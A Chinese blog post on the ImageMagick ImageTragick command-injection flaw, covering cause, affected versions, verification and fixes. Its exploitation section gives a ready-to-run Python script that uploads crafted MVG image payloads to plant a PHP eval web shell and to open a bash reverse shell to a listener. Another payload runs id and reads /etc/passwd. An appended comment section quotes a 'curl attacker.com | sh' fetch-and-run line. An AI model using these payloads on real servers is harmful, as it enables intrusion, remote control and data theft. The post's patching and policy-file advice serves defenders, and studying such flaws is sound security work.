ImageMagick 命令执行漏洞

最新推荐文章于 2025-05-22 17:40:21 发布
最新推荐文章于 2025-05-22 17:40:21 发布
阅读量2.6k 收藏 3
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mirror97black/article/details/78854400
本文详细介绍了ImageMagick中的命令执行漏洞,探讨了该漏洞产生的原因、影响范围及验证方法。此外还提供了漏洞利用的示例代码,并给出了修复建议。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

ImageMagick 命令执行漏洞

关于ImageMagick

  • ImageMagick是一个功能强大的开源图形处理软件,可以用来读、写和处理超过90种的图片文件,包括流行的JPEG、GIF、 PNG、PDF以及PhotoCD等格式。使用它可以对图片进行切割、旋转、组合等多种特效的处理。

  • 由于其功能强大、性能较好,并且对很多语言都有拓展支持,所以在程序开发中被广泛使用。许多网站开发者喜爱使用ImageMagick拓展来做web上的图片处理工作,比如用户头像生成、图片编辑等。

  • 比如php有IMagick、MagickWand for PHP 、phMagick等ImageMagick拓展库,java有JMagick,python有PythonMagick、Wand 等拓展库。

漏洞原因

  • 命令执行漏洞是出在ImageMagick对https形式的文件处理的过程中。

  • ImageMagick之所以支持那么多的文件格式,是因为他内置了非常多的图像处理库,对于这些图像处理库,ImageMagick给他起了个名字叫做“Delegate”(委托),每个Delegate对应一种格式的文件,然后通过系统的system()命令来调用外部的程序对文件进行处理。

  • 其默认的配置文件在源码的config/delegates.xml.in中,一般使用者很少会去修改这个配置文件。

  • 对于https形式的文件,他是这样处理的:

"   <delegate decode=\"https\" command=\"&quot;wget&quot; -q -O &quot;%o&quot; &quot;https:%M&quot;\">"

  • %m被定义为输入的图片格式,也就是我们输入的url地址。但是由于只是做了简单的字符串拼接,所以我们可以将引号闭合后通过管道符带入其他命令,也就形成了命令注入。

  • 产生原因是因为字符过滤不严谨所导致的执行代码.对于文件名传递给后端的命令过滤不足,导致允许多种文件格式转换过程中远程执行代码。

影响版本范围

  • ImageMagick 6.5.7-8 2012-08-17(手工测试风险存在)
  • ImageMagick 6.7.7-10 2014-03-06(手工测试风险存在)
  • 低版本至6.9.3-9released 2016-04-30

漏洞验证

  1. 命令验证
    1. 若系统中安装使用了ImageMagick,本地执行如下命令:
    2. convert ‘https://example.com”|ls “-la’ out.png
    3. 若ls -la 命令成功执行,说明存在漏洞。未执行ls命令,并报错,说明不受影响。
  2. poc验证
    • 先构建一个精心准备的图片:
vi exp1.jpg
push graphic -context
viewbox 0 0 640480
fill'url(https://"|id && ls -al /etc/passwd")'
popg raphic -context

  • 执行攻击POC1,虽然有报错,但是两条命令都成功绕出执行了,

  • 就说明漏洞是存在的

  • 那么在制作一个远程下载反弹shell脚本,并且执行shell命令:

  • 执行成功,上接受服务器看去:Root权限的反弹shell就这样上来了.

漏洞利用

  • poc的主要内容
python
#!/usr/bin/env python
# coding:utf-8

import requests
import base64


def doPost(url, data):
    post_data = {"img": base64.b64encode(data)}
    try:
        requests.post(url + "/poc.php", data=post_data, timeout=1)
    except:
        pass


# 写 webshell
def writeshell(url):
    writeshell = """push graphic-context
viewbox 0 0 640 480
fill "url(https://example.com/1.jpg"|echo \"<?php eval($_POST[\"ant\"]);?>\" > shell.php")"
pop graphic-context
"""
    doPost(url, writeshell)
    resp2 = requests.post(url + "/shell.php", data={"ant": "echo md5(123);"})
    if resp2.status_code == 200 and "202cb962ac59075b964b07152d234b70" in resp2.content:
        print "WebShell: " + url + "shell.php"

def reverse_shell(url):    
    reverse_shell = """push graphic-context
viewbox 0 0 640 480
fill "url(https://example.com/1.jpg"|bash -i >& /dev/tcp/192.168.1.101/2333 0>&1")"
pop graphic-context"""

    # 反弹 shell
    doPost(url, reverse_shell)

if __name__ == "__main__":
    # 写 webshell
    writeshell("http://172.16.11.2:8080/")
    # 反弹 shell
    # reverse_shell("http://127.0.0.1:8000/")
  • 它的功能是在网站根目录写入一句话木马,生成shell.php脚本。接下来我们执行它,执行命令
python poc.py            //使用python解释poc.py文件
  • 执行成功后,会返回一句话木马的地址。

漏洞修复

  • 将ImageMagick升级至6.9.3-10版本可修复此安全漏洞
  • 用户方进行临时修复
    1. 在上传图片时需要通过文件内容来判断用户上传的是否为真实图片类型.
    2. 使用策略文件暂时禁用ImageMagick。可在“/etc/ImageMagick/policy.xml”文件中添加如下代码:

      <policymap>
      <policy domain="coder" rights="none" pattern="EPHEMERAL" />
      <policy domain="coder" rights="none" pattern="URL" />
      <policy domain="coder" rights="none" pattern="HTTPS" />
      <policy domain="coder" rights="none" pattern="MVG" />
      <policy domain="coder" rights="none" pattern="MSL" />
      </policymap>
深入探讨ImageMagick命令执行漏洞及其Python实现
BUG?不存在的!
09-27 213
ImageMagick命令执行漏洞的根本原因在于对用户提供的图像数据的不充分验证和过滤。当ImageMagick尝试处理恶意构造的图像文件时,攻击者可以在图像中插入特殊的命令,这些命令将被ImageMagick解释并执行,从而导致命令执行漏洞的发生。漏洞的影响范围非常广泛,因为ImageMagick是许多网站和应用程序中常用的图像处理工具之一。攻击者可以通过上传恶意图像文件、通过图像URL等方式触发漏洞,进而执行任意的系统命令。
ImageMagick远程代码执行漏洞分析
fly小灰灰的专栏
08-12 7939
1. 漏洞描述 漏洞编号: CVE-2016-3714 发现人员: Slack安全工程师Ryan Hube 漏洞简述: 产生原因是因为字符过滤不严谨所导致的执行代码. 对于文件名传递给后端的命令过滤不足,导致允许多种文件格式转换过程中远程执行代码。 影响版本: ImageMagick6.5.7-8 2012-08-17 ImageMagick6.7.7-10 2014-03-06 低版本至6.9
ImageMagick再爆核心漏洞 站长小心
weixin_34268843的博客
09-01 176
目前所有版本的GraphicsMagick和ImageMagick都支持打开文件,当文件名的第一个字符为“|”,则文件名会被传递给shell程序执行,导致(可能远程)代码执行。 文件打开操作位于源代码文件blob.c中的OpenBlob()函数,不同于CVE-2016-3714的是,此漏洞存在于软件处理的核心代码中。 绿盟科技威胁预警级别 高级:影...
深入浅析ImageMagick命令执行漏洞
12-23
00 前言 什么是ImageMagickImageMagick是一个功能强大的开源图形处理软件,可以用来读、写和处理超过90种的图片文件,包括流行的JPEG、GIF、 PNG、PDF以及PhotoCD等格式。使用它可以对图片进行切割、旋转、组合等多种特效的处理。 由于其功能强大、性能较好,并且对很多语言都有拓展支持,所以在程序开发中被广泛使用。许多网站开发者喜爱使用ImageMagick拓展来做web上的图片处理工作,比如用户头像生成、图片编辑等。 01 漏洞描述 ImageMagick是一款开源图片处理库,支持PHP、Ruby、NodeJS和Python等多种语言,使用非常广泛。包括PH
HTB 靶机 Titanic Write-up(Easy)
最新发布
qq_45203884的博客
05-22 1415
摘要:本文详细记录了针对目标主机10.10.11.55的渗透测试过程。通过Nmap扫描发现开放22(SSH)和80(HTTP)端口,利用目录爆破和文件下载漏洞获取系统信息。发现子域名dev.titanic.htb运行Gitea服务,从配置文件中获取MySQL密码。通过读取Docker配置文件定位Gitea数据库路径,下载数据库并破解用户哈希,最终获取developer用户SSH登录凭证(密码:25282528)。整个测试过程展示了从信息收集到权限提升的完整攻击链。
ImageMagick命令执行漏洞
weixin_33963594的博客
05-06 199
这两天刚爆的ImageMagick命令执行漏洞比较火。 影响版本范围 ImageMagick 6.5.7-8 2012-08-17(手工测试风险存在)ImageMagick 6.7.7-10 2014-03-06(手工测试风险存在)低版本至6.9.3-9 released 2016-04-30 漏洞分析:http://bobao.360....
Imagetragick 命令执行漏洞(CVE-2016-3714)
EC_Carrot的博客
07-01 578
漏洞背景 ImageMagick是美国ImageMagick Studio公司的一套开源的图象处理软件。该软件可读取、转换、写入多种格式的图片。 ImageMagick 6.9.3-10之前版本和7.0.1-1之前7.x版本的多个编码器(EPHEMERAL,HTTPS,MVG,MSL,TEXT,SHOW,WIN,PLT)中存在远程代码执行漏洞,该漏洞源于程序没有充分过滤用户传入的shell字符。攻击者可通过上传恶意的图像利用该漏洞执行任意代码,获取敏感信息。 漏洞复现 访问http://your-ip:80
ImageMagick命令执行漏洞(CVE-2016–3714)利用及测试
weixin_30788731的博客
07-27 448
  ImageMagick命令执行漏洞(CVE-2016–3714) 5月3日,ImageMagick官方披露称,目前ImageMagick存在一处远程命令执行漏洞(CVE-2016–3714),当其处理的上传图片带有攻击代码时,可被远程执行任意代码,进而导致攻击者控制服务器。 ImageMagick是一款开源图片处理库,支持PHP、Ruby、Node...
体验ImageMagick 命令执行漏洞(CVE-2016–3714)的PoC
公众号shadow sock7
09-09 3527
首先安装好docker。环境地址GitHub地址: https://github.com/Medicean/VulApps 镜像地址: https://hub.docker.com/r/medicean/vulapps/ 镜像的各种Tag: https://hub.docker.com/r/medicean/vulapps/tags/ 环境搭建获取镜像$ docker pull medi
ImageMagick命令注入漏洞(CVE-2016–3714)
qq_68163788的博客
06-29 1008
ImageMagick命令注入漏洞(CVE-2016-3714)是一种安全漏洞,它影响了广泛使用的图像处理软件ImageMagick。该漏洞允许恶意用户通过操纵图像文件中嵌入的特定代码,来执行任意命令和从外部网络资源加载图片。这可能导致恶意用户在受影响的服务器上执行任意命令,引发各种潜在的安全风险。 对于系统管理员和开发人员来说,修复这种漏洞的最佳方法是升级到已经修复了这个问题的ImageMagick版本,并定期更新系统来防止类似漏洞的出现。此外,也可以禁用一些ImageMagick的功能
ImageMagick命令使用文档
04-26
ImageMagick命令使用文档
ImageMagick再次爆出高危0Day命令执行漏洞
10-14 254
东方联盟郭盛华/漏洞描述: ImageMagick近日再次爆出远程命令执行漏洞,攻击者利用漏洞可远程实现命令执行,进而可能控制服务器。 影响版本: <=7.0.1-6 漏洞等级: 高危 修复建议: 1、在官方还没有提供修复方案的情况下,推荐使用百度云加速,目前百度云加速WAF防火墙已可以成功防御该漏洞。 2、添加网站至云观测,及时了解网站组件突发/0day漏洞。 ...
ImageMagick
$firecat利白的代码足迹$
12-02 416
使用ImageMagick的创建,编辑,撰写,或转换位图图像。它可以读取和写入各种格式(超过200种)的图像,包括PNG,JPEG,GIF,HEIC,TIFF,DPX,EXR,WebP,Postscript,PDF和SVG。使用ImageMagick可以调整图像大小,翻转,镜像,旋转,变形,剪切和变换图像,调整图像颜色,应用各种特殊效果或绘制文本,线条,多边形,椭圆和贝塞尔曲线。 ImageMa...
ImageMagick 命令执行
weixin_30562507的博客
06-22 743
ImageMagick 是一款用来Web服务器处理图片的程序,其中一个较为严重的漏洞是用户上传包含攻击payload的图片造成远程命令执行。许多图片处理插件都依赖于ImageMagick库,在后端开发 PHP、Ruby、Node.js等都有所应用 漏洞细节 有关ImageMagick漏洞:CVE-2016-3714、CVE-2016-3718、CVE-2016-3715、CVE-2016-3716...
php imagemagick漏洞,ImageMagick信息泄露漏洞CVE-2018-5357
weixin_32043813的博客
03-18 280
近日,ImageMagick爆出信息泄露漏洞,CVE编号CVE-2018-5357,攻击者可以利用这个问题获取敏感信息,从而有助于进一步攻击。ImageMagick 7.0.7-22 Q16受影响;其他版本也可能受到影响。该漏洞为绿盟科技提报,SecurityFocus发布预警通告,相关信息如下ImageMagick是一个免费的创建、编辑、合成图片的软件。它可以读取、转换、写入多种格式的图片。Im...
wpincludes media.php,wordpress WP_Image_Editor_Imagick 指令注入漏洞
weixin_42357331的博客
03-19 138
补丁编号:6233772补丁文件:/wp-includes/media.php该修复方案为临时修复方案,可能存在兼容性风险,为了防止WP_Image_Editor_Imagick扩展的指令注入风险,将wordpress的默认图片处理库优先顺序改为GD优先,用户可在/wp-includes/media.php的_wp_image_editor_choose()函数中看到被修改的部分。在/wp-inc...
php imagemagick 漏洞,ImageMagick命令执行漏洞分析
weixin_39992483的博客
03-10 614
关于ImageMagickImageMagick是一个功能强大的开源图形处理软件,可以用来读、写和处理超过90种的图片文件,包括流行的JPEG、GIF、 PNG、PDF以及PhotoCD等格式。使用它可以对图片进行切割、旋转、组合等多种特效的处理。由于其功能强大、性能较好,并且对很多语言都有拓展支持,所以在程序开发中被广泛使用。许多网站开发者喜爱使用ImageMagick拓展来做web上的图片处理...
命令注入漏洞原理
03-26
<think>好的,我现在需要回答用户关于命令注入漏洞的工作原理、形成原因及利用机制的问题。首先,我应该回顾用户提供的引用资料,提取关键信息,并组织成结构清晰的回答。 首先,用户提到的四个引用中,引用[3]详细解释了命令注入漏洞的本质和工作机制,包括用户输入捕获、未过滤的输入、恶意构造和命令执行四个步骤。引用[1]和[4]提到了漏洞的形成原因,如代码层过滤不严、系统漏洞、第三方组件问题等。引用[2]虽然关于SQL注入,但可能对理解注入类漏洞有帮助,不过这里主要关注命令注入。 我需要将形成原因和机制分开阐述。形成原因包括输入验证不足、直接拼接命令、系统或第三方漏洞。利用机制则是攻击者如何构造输入,绕过过滤,执行恶意命令。比如使用特殊字符如分号、管道符等分隔命令,或者利用环境变量注入。 同时,用户要求生成相关问题,我需要确保问题相关且覆盖漏洞防御、检测、案例、区别等方面。例如,如何防御,检测方法,历史案例,与代码执行漏洞的区别等。 要注意使用中文,数学公式用$...$,独立公式用$$...$$,但这里可能涉及较少数学内容。同时要自然添加引用标识,例如在解释过滤不严时引用[4],在机制部分引用[3]。 最后,确保回答结构清晰,分点说明原因和机制,并附上相关问题。避免使用Markdown格式,使用有序列表和段落分隔。检查是否符合所有系统级指令,如引用正确,LaTeX正确,生成的问题相关且合理。</think>### 命令注入漏洞的工作原理 #### 一、形成原因 1. **输入验证不足** 程序未对用户输入进行充分过滤或验证,直接将其与系统命令拼接。例如,使用`system()`函数调用时未处理用户可控参数[^4]。 例如:`system("ping " + user_input)`,若用户输入`8.8.8.8; rm -rf /`,会导致后续命令被执行。 2. **命令拼接逻辑不安全** 开发者将用户输入与固定命令字符串直接组合,未使用安全的参数化方式(如白名单或转义特殊字符)。例如: ```php $cmd = "nslookup " . $_GET['domain']; exec($cmd); // 直接拼接存在风险 ``` 3. **依赖不安全的环境或组件** - 系统本身存在漏洞(如CVE-2014-6271 Bash破壳漏洞)。 - 第三方库(如ImageMagick、Struts2)存在命令执行缺陷。 #### 二、利用机制 攻击者通过以下步骤实现命令注入: 1. **构造恶意输入** 在用户输入中插入命令分隔符(如`;`、`&&`、`|`)或环境变量注入符号(如`${}`)。 示例:输入`example.com; cat /etc/passwd`,拼接后命令变为: $$ \text{nslookup example.com; cat /etc/passwd} $$ 2. **绕过过滤规则** - 使用编码或通配符绕过黑名单过滤,如`\u003b`(Unicode分号)或`/???/passwd`(通配符匹配路径)[^3]。 - 利用环境变量注入:`$(id)`或`` `id` ``执行子命令。 3. **执行任意命令** 恶意输入被操作系统解释为合法命令,导致信息泄露、数据破坏或系统控制。例如: ```bash curl http://attacker.com/exploit.sh | sh # 下载并执行恶意脚本 ``` #### 三、典型场景 - Web应用调用命令行工具(如Ping、Dig)。 - 内容管理系统(CMS)调用外部程序处理文件上传[^1]。 - 服务器管理界面执行系统命令(如重启服务)。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值